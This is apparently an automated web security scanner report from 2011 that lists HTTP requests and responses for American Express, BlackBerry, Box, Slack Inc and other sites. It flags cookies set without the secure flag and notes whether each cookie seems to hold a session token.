HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:59:22 GMT Server: Apache Content-Length: 3639 Set-Cookie: JSESSIONID=vG1dNNWKvTrnmZhJc7QHlY8p5PBcRt6fsv8sVgVQQ5zk46f6XVL2!-1021108312; path=/ P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Set-Cookie: NSC_kmkcwxm=404467a20838;path=/ Connection: close Content-Type: text/html
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /profile/ HTTP/1.1 Host: www.blackberry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.box.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /reprints/order.asp HTTP/1.1 Host: www.slackinc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:09:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 44530 Content-Type: text/html Set-Cookie: ASPSESSIONIDCACARTTB=MHBALOKCEGMPNINNPNAKBMPM; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>SLACK Incorporated Periodicals Division</title> <STYLE type="text/css"> ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /subscribe/newsubs/atshcstep1.asp HTTP/1.1 Host: www.slackinc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:09:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 2544 Content-Type: text/html Expires: Sat, 05 Feb 2011 22:08:47 GMT Set-Cookie: ASPSESSIONIDCACARTTB=KEBALOKCOFGEPEJFNBJCPGGJ; path=/ Cache-control: no-cache
<html> <head> <title>Athletic Training & Sports Health Care Subscription</title> </head> <style> a,body,td, p, blockquote, H5 { font-family: arial, helvetica, sans-serif; font-size:12px; ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /subscribe/newsubs/otistep1.asp HTTP/1.1 Host: www.slackinc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:09:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 2526 Content-Type: text/html Expires: Sat, 05 Feb 2011 22:08:43 GMT Set-Cookie: ASPSESSIONIDCACARTTB=JBBALOKCCLGHONAJLBLPKHGK; path=/ Cache-control: no-cache
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /MobileWeb/index.jsp HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:06 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944526576342; path=/; expires=Tue, 09-Feb-16 22:22:06 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0001PGzoPxDqqpRWVuPalmTJrf8:11m1380s8;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 33070
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /merchant/marketing-data/pages/home HTTP/1.1 Host: www209.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:11 GMT Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: mertkit_JSESSIONID=0000HmJMpZYY_G5msSiTYEScCWJ:15bvkpc1o; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Set-Cookie: BIGipServerwww260-443=252447242.47873.0000; path=/ Content-Length: 67227
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /merchant/marketing-data/pages/marketingprograms?inav=menu_business_merchmarket HTTP/1.1 Host: www209.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:20 GMT Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: mertkit_JSESSIONID=0000a-qFEyjWmRA77-ia4auLoKF:15bvkorqu; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Set-Cookie: BIGipServerwww260-443=873204234.47873.0000; path=/ Content-Length: 45136
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /merchant/marketing-data/pages/reportsandtrends HTTP/1.1 Host: www209.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:17 GMT Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: mertkit_JSESSIONID=000014rUJ6zb3offa-6mrx3LyBv:15bvkorqu; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Set-Cookie: BIGipServerwww260-443=873204234.47873.0000; path=/ Content-Length: 47317
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/OnlineSelf-Services/ConsumerLanding.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:30 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000sm8JxdH8S2k1shfy-P8NSQw:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 13749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/feefreeservices/pages/globalassist_allccsg_shareddetails.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:40 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000yMXBfzRiROj5OAfOa5QNbix:14qpqp8bv; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:43 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=000090KnSa_PToPYn1Y9A6kHv8g:14qpqp8bv; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/pass_markup_homepage.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:34 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=00000ddg062iZbtkKQLHV7glhsR:14qpqp8bv; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/travelerschequesandforeigncurrency.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:38 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=00000vjRd_mY3YpSpW5gdtG8i9S:14qpqp8bv; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do?vgnextoid=f25533fadb4ca110VgnVCM100000defaad94RCRD&vgnextchannel=9823f30b6b1ca110VgnVCM100000defaad94RCRD&us_nu=footer&source=footer_privacy_statement HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:45 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000U01HD7ILpMUGqR_UyygusU9:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 55185
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Internet Privacy Statement</titl ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/smallbusiness/businesstravel/businesstravel.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:39 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=00002CcYYbt_TpWnMDtRNICsW6f:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/merchants/nonsecure/acceptthecard.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:06 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000ah4vhZojFRvbev9f5GE_A4A:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 13749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/merchants/nonsecure/manageyouraccount.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:47 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000PTe6zKm28D31BsFXcYHD9d8:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 13749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/int/contactus/personalsavings.do?vgnextoid=d752e13f929a7210VgnVCM100000defaad94RCRD&page=7&inav=iNavUtilContact HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:16 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000fxhwIOrKDi2q99FOvTDSEpr:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 35307
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/int/fxip/fxinternationalpayments.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:10 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000gNZ28gvXI_sQMcByieAazU2:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 13749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/int/us/en/cmaproductspage.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:19 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=00005KkxZLI1O88IVa_7J24YNHg:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /PowerLabsWeb/un/landingpage.htm HTTP/1.1 Host: www213.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:33 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944613478399; path=/; expires=Tue, 09-Feb-16 22:23:33 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=00000YZCQTdcKvGRMYP-Rq79eWY:129nma7r7;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 81548
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /openhome/smallbusiness.do HTTP/1.1 Host: www257.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:41 GMT Server: IBM_HTTP_Server Pragma: No-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=0000uChEcdO9k6KqbMgMdp5Ow2Q:14t0oj3g0; Path=/ Connection: close Content-Type: text/html;charset=UTF-8 Content-Language: en-US Content-Length: 888
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /entertainmentaccess/home.do HTTP/1.1 Host: www295.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:49 GMT Server: IBM_HTTP_Server Set-Cookie: ehub_JSESSIONID=0000NpczdATYAiPRlcF0VGZHggr:1563unio9; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 80280
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /premium/credit-card-travel-insurance/home.do HTTP/1.1 Host: www295.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:45 GMT Server: IBM_HTTP_Server Set-Cookie: fsea_JSESSIONID=00008GQpyAcWkVMiczzEQLBcHuM:156jli7te; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 36699
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /premium/credit-report-monitoring/enquiry.do?inav=menu_myacct_creditsecure HTTP/1.1 Host: www295.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 05 Feb 2011 22:23:45 GMT Server: IBM_HTTP_Server Location: https://www99.americanexpress.com/myca/usermgt/us/action?request_type=authreg_PPLogin&lgnsrc=PP&Face=en_US&REDIRECT_URL=https%3A%2F%2Fwww295.americanexpress.com%2Fpremium%2Fcredit-report-monitoring%2Fenquiry.do%3FSC%3DL6L%26BC%3D0003%26PC%3D0001%26lgnsrc%3DPP%26Face%3Den_US Content-Length: 0 Set-Cookie: fsea_JSESSIONID=0000ax6luTP71CaQfFifYiUvIPV:156jli4a5; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html Content-Language: en-US
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /consumertravel/travel.do HTTP/1.1 Host: axptravel.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/corporations.shtml HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home/global_splash.html HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Last-Modified: Fri, 26 Nov 2010 10:10:41 GMT Server: IBM_HTTP_Server Content-Type: text/html Cache-Control: no-store Expires: Sat, 05 Feb 2011 21:50:49 GMT Date: Sat, 05 Feb 2011 21:50:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: bandwidthdetect=vhigh; expires=Mon, 07-Mar-2011 21:50:49 GMT; path=/; domain=.americanexpress.com Content-Length: 37032
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD><TITLE>American Express</TITLE><META http-equiv=Content-Type content="text/html; charset=windows-1252"> <STYLE type='text/css ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/mt_personal.shtml HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the secure flag set:
BIGipServerlct-pool=87351818.38687.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: lct.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" ETag: "AAAAAAAAAAA" Last-Modified: Fri, 14 May 2010 01:40:56 GMT Accept-Ranges: bytes Content-Type: text/html Content-Length: 0 Date: Sat, 05 Feb 2011 21:51:17 GMT Connection: close Set-Cookie: BIGipServerlct-pool=87351818.38687.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myca/acctsumm/us/action HTTP/1.1 Host: online.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b HTTP/1.1 Host: sb.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: https://sb.voicefive.com/b2? Date: Sun, 06 Feb 2011 16:04:44 GMT Connection: close Set-Cookie: UID=4794bf8-184.50.222.110-1297008284; expires=Tue, 05-Feb-2013 16:04:44 GMT; path=/; domain=.voicefive.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /airlines-credit-card/ HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /credit-card-rewards/ HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gift/giftcardslanding.shtml HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:52:57 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296942777855214; path=/; expires=Tue, 09-Feb-16 21:52:57 GMT; domain=.americanexpress.com Accept-Ranges: bytes Cache-Control: max-age=-485925 Expires: Mon, 31 Jan 2011 06:54:12 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 64996
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gold-card/ HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /no-annual-fee-credit-cards/?source=footer_noannual_credit_cards HTTP/1.1 Host: www.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /partnerzone/Forward.action HTTP/1.1 Host: www.blackberry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 06 Feb 2011 16:05:27 GMT X-Cnection: close Content-Length: 1214 Content-Type: text/html X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: BIGipServerPlateau58_80=611926282.20480.0000; path=/ Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN"> <HTML> <HEAD> <TITLE>Error 404--Not Found</TITLE> <META NAME="GENERATOR" CONTENT="WebLogic Server"> </HEAD> <BODY bgcolor="white"> <FONT FACE=He ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
